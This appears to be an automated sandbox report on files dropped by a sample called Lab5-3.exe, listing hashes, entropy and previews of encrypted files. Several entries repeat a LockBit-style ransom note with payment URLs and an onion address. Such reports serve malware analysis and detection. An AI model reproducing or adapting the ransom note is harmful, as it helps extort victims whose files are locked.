                                                                                                          Malicious:false
                                                                                                          Preview:1.JW..V.....T K;.[!.z.h.....j....P.1/....W..)..2(.Z..N(..1r.pQ....]^..e.X...bTG....fN.l.m:A.f. .1Z.(....Kw....../.hu(..4.a.t.uI......F.....e..d...V.1...!.Sf..2.`.#.....E....e1h(G..@../..}?..l...J<57#.X<XP*...Zc..`.W.....N....E.,.n_..G .!..U]s.....G4p.u.DM.................U[....x...F.Jm.e..E...].L.,E[.....R.qi...T.&D3.2..b.l..V.F..q.z. K,[e..m^.Y.>S....&...+*.N.m.D...N..g<......r..zs..f]..%C.V....I..=].sz.Q[.z~4|..%n.........W...^.s..R....*u.wk.C.9..bvc......L..MN......F.....*..2m.s+$y+Z........^..i.+.*......^`N...;. _.....m.K....5<..,..J>.@7.9qh...P..P.r.|h.].......Y<:..D.qr....I.%..N^k.]_.:=......mn..=?.h0.n;.Yw..,.~..,!...#U9..3....o.Xw.H`.E.g._.#......C.E.....[...HR..4.z.....7.~.X.4.C.gw..f;t....H.p..R.+OJa.!.....k?.[+).....=y.4.w.....H.....)..."....{.i:M9...n...N..aP>.p..{.~..M.....}i.*.B@%...oC..v.M.....H.....gc....9../P_....u...z...1u....Sl$...z..8@..6...=p.#...T&'.Z.....ne..$5.w..rogs|j.).-e..AZ`).X]...6m.........I`x^...!7|.59....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9358282424009605
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/xx3iKFRgL6LjF5TjfXkmanvZHfUTid3hBaUoSGFcmeykEdEElU92i:/x5y6vj3fSvaGx0uKeY2ElUJ
                                                                                                          MD5:5F4D2851F3DA69C646D4C3C5539F2AC4
                                                                                                          SHA1:C7732D6E400568160CDA0F8EA843A4FF57BB77B7
                                                                                                          SHA-256:90F85DA4BBA34C25AE9F3D2E48BE172073C913A4FC347782784794B62818A1D3
                                                                                                          SHA-512:7395EDEFED5E767F9A0FA1AA24D799BF1C3285D9B5226BDDDBE9501A333BD5C28EE8314DDE7F633C15D7870F4942DB3246BCEA343BA9D3485AA8FE2A06255A4C
                                                                                                          Malicious:false
                                                                                                          Preview:....Ky.9&.W...kY.)..]\E.5..J......L."......Nr.._..":=.g...........Gt.../.Y).=.Z...:...K..N#...C[..H..oJn<a..t.....m.e..F.Z."0=...*.+c]E...pCH..5"....q.h..c..t(.mg..X`....6.2...?..JVd.I.-.,...N\..\..J.`....T.!.P....B}o....U..8....R..6u.7yr.;D..... K..$M..'Up.n....{.R.@........b..\.L...]..A..kJ....c&.?.<.>.. 3b.....a..3..k.......Q..gzE......V.....k*.o.o...`..g....-...(.a...n{....(7...Ycu..#:.wm...HG.j.1Ko.5^`+.1.m....R..`..&=........1...X.....{`.I&.......b..\..:....1...{...7.\....jb.4.t.n.>.$..S. .....J-.0m.N.5....c.}X..P...G.3.'6~p.p5..F..;.(.....l%gp.@g.MdS..5....7...}.y....;.$.2.^...Q...0t.T.......y...=...8.$~.......kW&.e.X.F!..E.(..c.....?....&cM,33..g(I..F..%......7...d_.Q......l.J@.(....>7....H.r...X.4'.].....T._...B1.*NlHU.........X`.....'...q....wH...~...nx..N.....#..+.,.:.....,=.O..:.d.h...8. F.....R.a..-.L..6...az` /p...Fr.J8.7....!#.....'.._.wr......3.B.(r..fP[d.1[.......A@.V.q......y.5.c...x..%.C.$.......f._......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.932131446059164
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YqGDl/uEwY2K4NKY/DYHfUTid3hBaUoSGFcmeykEdEElU92i:YiEv2K4H/D/Gx0uKeY2ElUJ
                                                                                                          MD5:539A4DEF80D4290AD5256E1B8C35AE76
                                                                                                          SHA1:40BD2478BF7C88A6DD317F73D69AA2FC7EE24970
                                                                                                          SHA-256:547F8178C7C3FBC0F1F6894F108E08A0001183334C6B1F2946589E96CE44C30A
                                                                                                          SHA-512:6C91D6DA9E032CE821D5F69825856470FC3A7CD8B900FBF9A218D401A32C4639A6A8E21E5AD9C577242846F1E4F081E0987C45CD6D7A47686F32AEC784184DFE
                                                                                                          Malicious:false
                                                                                                          Preview:..>.....KG.E._....] ...F0MeTD8..a8.G....z8...o.`G...$...[j..[kO] f.....a...NLT.Y6......~...A2.K._?..&..`.d....Sy.Xp....o.K.|.F..<.k..%Y..).....B|...M|1..)'Ya.a6w.&.%.,{....h.%[.<....?.GF.Y......9..E...J .T...)...[V...%..Y\.X..k...rn tL.i.YjL.i8L.HH..7....y.P.....5.+.....G.cb.Dcg.K...\....U!.,&....Y.7..{..j........S.!I.a..@.......p.~#.y...H...e*S`7.C..3_g)v.L:}.,...(}...wH.O.9.......>-.g..7.....r.....Z..X.^f ...EDa.2........Q.n.. .).:.db.......C.uCqr.A.(......bE.pn.._..J..{...6.....[6u....V.Y.Q..`..#.1..}.......OB....W~..W..7.....VdM5..i.Ll...........W.n..y2.......j..4E..*....I,..O..2.R3iG..XSxI?}....1.i...kP.......C7N..5,.T.2.G-.V.qq.......#..KV...x.......q1..JPK.4.c.q.=..7.....#.hV#.-..O.^~.D..2nPj...(....d.x'....y....<.m.<..yR|....T..N......`.;.GeW..I.Tl.Q..ia..o.....o...f...)L,X.z<F'.Vs(2.....^..Q..E0..DE./..2....(...(..'g.b.....F.4.8...x...._..dp......mjx.LI...XC...N:H.,.`T.SA..Ks..i(.$9=.k...k.=.r. .=e.^.c5..^..M......../.[...et.Qx...Q..o....e...8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.919676667790186
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VFPornBQfP5PynEKjgNX882SrLHre0CjHfUTid3hBaUoSGFcmeykEdEElU92i:VOUhPGEK8R8QfLehwGx0uKeY2ElUJ
                                                                                                          MD5:16A2CFB524702251EEBFE4AA20DC5F62
                                                                                                          SHA1:28D7805975D7985CC43791156E16C1E5984EC35D
                                                                                                          SHA-256:678FA0D5A1DE11F62BB7C354D28AD10F5AEC293B0BF0CAF6C412000B68A6A8DF
                                                                                                          SHA-512:D106F8B67AAC9488C7163C62FF88A7A86110F07EC6FB5E2489009ABBA71BCD0C7DD07ED378740CC44955F8AD65FABD7BBA79EE0808C5F481E92A71E6E4CE7374
                                                                                                          Malicious:false
                                                                                                          Preview:xY..!.~.....R......X....t6...m.k.[..?..{.i..W....^..M..[....+.....Rz..G.+l...[.7...n...ug.......*..?|j.4.pv.m.Tkb.2..#. ....x..AE......>G;.....&C..........;.-.pk^H~..(xXx. ..;.*.Kpg.T.e.........+..M!...*.......k..tc.r....!..>}......3........g..`H.K_3.....D.5...g...`...N..Y69\fQ.]MV.... ". ............."..R...9.P..8...F..<..... .$.\ZoF.a....6.r6,.M....+03...... ..x>........A.*}.G.V]..._..i<..6..k\OX;Jd*..I!..G6r.b.Z..bw.X.y.q1....M.X..!r........+.aK.(.|..S=.K...........^.s.f..o(n<.b9.cS..iUV5.\1F...DV..-.LXs53.|`.....d.{6^.Iy.F..@.........>+k..y."U.........>L...5..Fj".....vIb.|..H!.S.i.6U6.M..%...^`..?.NJ..t.qj..a...#.n.........ZA2n._....I2...O.....YV.y......4\..w1c&....8..J.._....{v..s3..h.I.W.....It6..QC...I.^O*...*.....|.s.69..MQ.........+.#.~;Pg.\...Oe5.+.z./.i..Wk./.J..Xk....)3.....E.^cu.e.p.......X.m..h.9P.z.\.....=92.T.Zs.d....N'../.e#........S.,G..;....[..a...A....".;9.F..@.q.=I..~.#...p..?.T...\..n.t..bR..?.S..P..P.D..[...^LGe.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.923636439084307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FubWTT9Mk/LdF8uu+/uRVVHfUTid3hBaUoSGFcmeykEdEElU92i:FbP9FdF8m2buGx0uKeY2ElUJ
                                                                                                          MD5:F2FD3E27D332A5EFCFEAD90ECE3EEA68
                                                                                                          SHA1:649A7745DFA3D2D3CFE81C2142EF18012FE5B6C4
                                                                                                          SHA-256:B05BAA1891255289F8BCE8EAE5838D7B49F77E9782DF6D174A6F74397A9361D9
                                                                                                          SHA-512:C901980738C088CD99BDB049866613785EFD648D7A18B78016CA8A5F12EDB523806F0BC13593D9BA632A2C3656C5576CD3FBC6DBA6A796C4191E58C3CCB0536F
                                                                                                          Malicious:false
                                                                                                          Preview:.....*k.M.O.../.-.6...>......w..o4.jS.%.Y+.Jv......w........L....H.....XaV.S........o.....>K.-.m>%z;.A..:...L"M.Z'......Y.1..F.......V...;.|..v..4F7..Z.GT.x9........kO...A..........%.Jr:....x...8.J..g-.:..g`.&.d.m...T-....*|./..w..;.n...X.c;g.!Q..&[..V..g6(..4...S.I...6.cS...,)..L......a.u.................}.#...k.....~..#W..h!F. p.(..E.[...9.g..\..'sS.....+l......z,x..u'M...f.F..&.~..#0..7.c.{@A.y......5P.l..'.Ul...}...6..Bj..m.@...z.D._.f.?.0.[cn/_.V....."^.OC2...y..4..&g...ig...~.....F..}sc....*.<(.\.U........Bw.g_E.d...9...N...j ..H..4..H.1+e.p...t.2.7.,........(.....V.A.e.)3H..o~M3}......T...._......`....]..]a.g.....j*....Q...U+.,5...~.0..R{..f..>|1S..}..>...9.._A..<@H.......B.@f0xl.........k.N}.(.08.....\..|.7h.t=.\.o<.p....Vh.<......^R.<..`....hM..)......#.3.n.m...$...$.N.5.A.0g+*2.4Y..=.xt.6..fV........7.n.C^...%o......7/...v....0.l..6.M..=.).A.w5M...o;...7....m...'..].tx}S}...HYt....q.d..BY.....~.4.l.t.......?.W...0.Wh...F...+L
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.933278447127337
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pHZeLqHYD3q7I8sLzK099SCrzHfUTid3hBaUoSGFcmeykEdEElU92i:3eOHUsIhKXGx0uKeY2ElUJ
                                                                                                          MD5:725D2E9875882868BE68580522DC4FAB
                                                                                                          SHA1:C14E1DDF059A23FAF52B2D46E2BECC83DBA3F66A
                                                                                                          SHA-256:60D4FEEBBE1A0111DCF353169E210D5E5301E665DEAB86199B0FD86287BA9E54
                                                                                                          SHA-512:1EE57D1ED8C4A9189AAC09EEDAB3AD4ECA57976017A11446DE44513DB196DFCACC09917FF3F0167715DD985DF2752F6DFF75582FADFAD7ED4391337881353B65
                                                                                                          Malicious:false
                                                                                                          Preview:..B....Mh.p.DR.O...a......H.$ .C.l.?.U..g.`D. sd..ok.u.O.. ../...^.....0T.8......>....(..\.4*|.z.e.S.ku....E...I.H..D..@$...G/..1...).S..u.IG..e.+...8.............Xb.G........"t.xzV/.....8....^..JB...........@..T..Z?.t...b.Jw6CK..Gl.@g4.L.......A0..1.d.i......'...q;..q.....|I.e3X.._?.s%.. d.H@4J...&.s.{...^.9...U.>.[..4?.....5l..d.I...1..r..]/77.....R.%?...R.O...L...ti.../..|..b.Im.#.......<....3.V:..8G.g.B...b.~A..6.~...3...w..H&.m...e..@>...........~.~......C..d..BK....-xGR....9.~HI.T......y...R0s.DBy.+^+QxwF...6...'s6...4[..).....).~.w."??.>u...........Qd..{s.3..G......M.F....lm.X.^T..g)]p.yo.u.=..M.g..f.._..U....]L.u.._.@=9...q'-....{NRD.,%.....ae"..W..A_.:..pA......u.....I.vC...b..-.....{*.".l#.@...~..zH.|P...o......!.^)J....g.[.B.!.n^P.j..3.4.n.l.(.........@...7|.}.......U.}.Ty>m........M..2.'K........S..)i.N.......T...12.~[...Z.AhK...O.aUa.|..|.....y.St.....X....i"x.B>....Jv....2......7..........6.%........Q..S..;...6.9..T].S..$.Q..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.931890077038531
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lUkNcqW8gtn/PMqruYfJvjxSiC2HbV/Ze+LHfUTid3hBaUoSGFcmeykEdEElU92i:lpo8gtXrrDft24bV/Y3Gx0uKeY2ElUJ
                                                                                                          MD5:EBF6199788CD269D4639AA3D090531A8
                                                                                                          SHA1:9E96E56373501BD0CE51CEC62EBD8B01305FFCC8
                                                                                                          SHA-256:0CEFAB5433D7278D41A2B0851567D550763E84C48493BCB7B98B890A543D6128
                                                                                                          SHA-512:6913B00F5A00028DB2CBC25856CB2BAE7BB5B0A961F4948768BB7BEE4C1055799D8E5A46BF7E0401F004D8380C74E8A3FF19911407769967F485E49D820C93E8
                                                                                                          Malicious:false
                                                                                                          Preview:>.c.N...z.=M.z.(.x.c..#...|^O..{_B.hp5yh...Y.K....$.....~>..3W.?V-........u.j.&.*.0.yCF...C/.a...E..f.....?.m..OK...].|........e......o.]s........^.:..s..t......i.......u...lV&..W,,/.}p.<.Z.V ;d^.....yf.w.[$....\....../2.....6..z h"".Q...e...-..l.....N.&@eT0.......pl...`V...#....{i+.%..<x.db./......Z?].&.......W0....[.....ME!....q`...D.'?..Q..z..t.....X..kY1.r...YN....,./.n.O..~..AH..._..8..[M.o..C....r$,y....ewK.=...Y.2.\)...4.uZ..\.(DH...<u.h....[..wJ.....`....r..|@"..5..1&.&..\.B.4...!2..A...d....":s..\.8..g\.c-.Y-.+i.u%.a:q"7....H.${.:.k)..L...2.....o+H...c......Jo.....6W.lI.-....<\.Y.'6...>,v..V....9..!.R#.7..uG.O.`..W%+.....Jp.P.~du =.(.R...!....5.#".Y....:.A..K.:....QfZ...R8.....U.|..#.. t........?..]...d..l.....5v.`.?...*Ot......._.(&..m..J@......I.5.i..."e.....i....K6...Rc%.._U.T...0.q%.Ff.R{u.h\...*k.iHU..n..Ei4,..........z....,...ty..g.E..2..P..T.._.....Vo,....oS@.p..ql...Q......8A......bn.......J.:..~a6.... j....)....j*..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.921332931725324
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NrJHWw/47IjlKyp8aXLlDO0HfUTid3hBaUoSGFcmeykEdEElU92i:NBt/4YQv6LoGx0uKeY2ElUJ
                                                                                                          MD5:6C0A9DFB059F98CFBBC2DF6882DFEF8C
                                                                                                          SHA1:EF22CAE033CC9AFCD76E3F5D8F2E74CB025AD1AC
                                                                                                          SHA-256:09877EC2B86B5D33F3ED03ECDF41897087D9F4400183B71BD85AC4F33DA3FC65
                                                                                                          SHA-512:5F8D197CEE1374AA53327E79419EE36A55C1732BBB6E78CB72BC86150190FF5AA368F9A6CB5672581299D47313B73C8A10FDA16D4685107E892865C3993D22F8
                                                                                                          Malicious:false
                                                                                                          Preview:!....OFg...A.x...].(..0..y..fw..R.v.....T....Q.=.=...../...x.......r.=..."....g....S.:l..|.X:C.oU..m...{#.}v...a..,a.X.....<.%.Z.LR.....A?.+...\..Kgj....R.x...E^.._..&.....N.'.t.XM?._@...V.[.".H..B..em~.A.qONk....x.L....S...P.z.{.t....;z%....C.6&....A.wu3.z.G.....yI....[Ne......H......&....-.].9.......,7bqh...HTD....E..T.....-.?.,.+..C......e..5....`.cK97..=Fv0o...b`[G*.....d.'.D.[..5.1..<$....,....T..wy..lxFH.t..b.....u......-.%..$....*.m...........+..5..K,..H.f........`_.J...`8k[...<s_T#.^vCR..v..]..M....XzU?^....$.vgJ.Z..k.../q.....'.K#.....t,..t..Q..\?....%)2f<w..mSx?S~._./..........(...t......`qIg.NH.W... e..aah.P..:......}3...{.vx.p.Z...kN......_.=.i.....>b..uq.3..OQ...6..:E..7...F.V........\.....5.<gU.q..k..s.(...G...%vo......H............!.....,!...+%Y..7...q.T...K..B...&...7...H..ZID..5q.&.r.../I.........Q.'. ....G..=q.a...-aa~@1.Q....;.*...#3..,<}.:a.zA..4w\Z...+......z../8...s`S>.Q.-."S.(]Y.J....."...k..<.*S.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.930497985804173
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bgBLzy3r/I81ajtL8m7rjuKazkS0HRHfUTid3hBaUoSGFcmeykEdEElU92i:yadKK7K5ScSGx0uKeY2ElUJ
                                                                                                          MD5:4395247C721D0354CB02AEF7824609C5
                                                                                                          SHA1:47F01CE2B33886B675AE52462075D9FF3822091E
                                                                                                          SHA-256:8EFC71B88449851EAED9F4581DD20744F0F725D43C7364CFB4043E88347F26C4
                                                                                                          SHA-512:409F91AD1CF8938946DDAB43D20F85B46D163CE8EF777E878DBD1EE1B8D6E4764544E3836B109DE5920BE4BA909D2B125EA901A9B75371EE2FF17A9BB9CCB194
                                                                                                          Malicious:false
                                                                                                          Preview:\...@..7......B..(;I..7...8..yu.s..[.g.2`..SX8.@7.2.R..`...E.v......).Xy;O..$"<.F.LZ%X.H.P.4....G5..&H.^".HwM...T..7....T,.Nt....8W.....J..Z>.,..!.......2....4_.....4...5!Lp.^kQ....r..C....P5.\....`&...H/.9..f..._$9..%\W^.0.jp....%.q.."..Q..(J........*o.Z....(.;.....'............B.w%.....mu.d.......NH...UV.....|.B..O.].'i..5.^.pG...m5..z...=[.Q......&o t..=.80...:.A.):./h8^.....IO.....Ft.....W2H!....0.@..qm......L..b..d[.....z..5..S....J .SJT..2.....I.K..G...Z..\....F...[.>.n..yc..RO|.?.?$..7........O..'m.......|/*.U.B..5...- C.2...~.N..0.CT2..)$!...5..8..a.....:..c...G}..Y..t7..7.[....1...E.p.c.L.B!.9......d..w>*.'Z&...v.k...G...*u.8..6.....'..}*......wG........U..o5i.N.A.V.....z..<%.......<.t.U.tC...O.N.z....2.|.8..y.......%.N.|.6...Mo..0.=...M=8......n......./..ya...D...z.U...CYz........5U(u..].i.P|.e.<i\.>.....qA.F.e..+...\=...D...J;>W.;v..1P...nHA......TE.-......(eD.....b..d........m.A..&...A.;.P......L$......M.K ;....N!.Q...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9218186600844565
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eHap60++dAa6njb2S2iY/e6DO3VHfUTid3hBaUoSGFcmeykEdEElU92i:eHnEdDwjbpFYl7Gx0uKeY2ElUJ
                                                                                                          MD5:DCB5AF361C92787F589F73229750B54E
                                                                                                          SHA1:BC64164CC364B25C93B7F24834573E0262FB3149
                                                                                                          SHA-256:5F92139CF6193B93E69557430FF3CBD2D7A2CCB77F3E5C7779CB6A81CF4846D8
                                                                                                          SHA-512:902C401B67991F6B4808D2E9E2076F2898067C05BABAAD57461419C7A4BB52AE4C0270FA7E7EB72C95526D176179DEDC6079902FFF5BACF4077D69EBB932A8E0
                                                                                                          Malicious:false
                                                                                                          Preview:v..... ..0p..F3*=.5=.tA.....j9B..I.YO..M_.b...un..F=....M.@h._yE....N.b.`[v.'Lq...N.S...b)...@.+.Z|HMx..P.C..0.75.H....s..J.......x..c..............W.V...e.{..SVzp.Z.....c.1-}...3}7..)..O.._..0D|`..VM.~!=.4.{3.S..1...}_%.;..}..t............p....._CCr....K. .<{..XSC..l++.B....i&."....'4.Uf.-yD.L3...P...=S...~..n)./s.b..!S=.}....@.Hh.....w*.,..w...........7]E.v.".V...R...C.......$.^......N._.!A!.;.q.Q.>...),.0...Y..."......Hq.bR..W.C......=... .....S.??.......v.^...p..3.U.2.0T.-.Z.O...C.&.F..f...B....o..w...{..>..S.6]J7...'.j....~|.L........Df..XN..3B{.U..........C..|.....V.E....M^.N.S&B.2../.pMv.cE.X....-../U4g..n.V.M`T....zL?.gh2$.xW. C..#[.....e4<X..1..........vt...b.......q.y.d^5.....:..G...,.z...R..\....[...t.HV.w...+....3..............`>.D[D.V.../.-.8.AK.`;."d..TZ.....i.......{.M..W..m..a....W...,..^...vm.U.^.!..U.*.B..m..&}...(....$N4..../......Z.>I.t....(...I......[.....w=.M...ybp.Ql...2.4.<R4...Y.m.05`aj5.<....-..%..#..o,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.898643937196584
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:iwIhDRmvf21HfUTid3hBaUoSGFcmeykEdEElU92i:9Irm2OGx0uKeY2ElUJ
                                                                                                          MD5:EBC04C43F8D682475B08A3E4266B1FCB
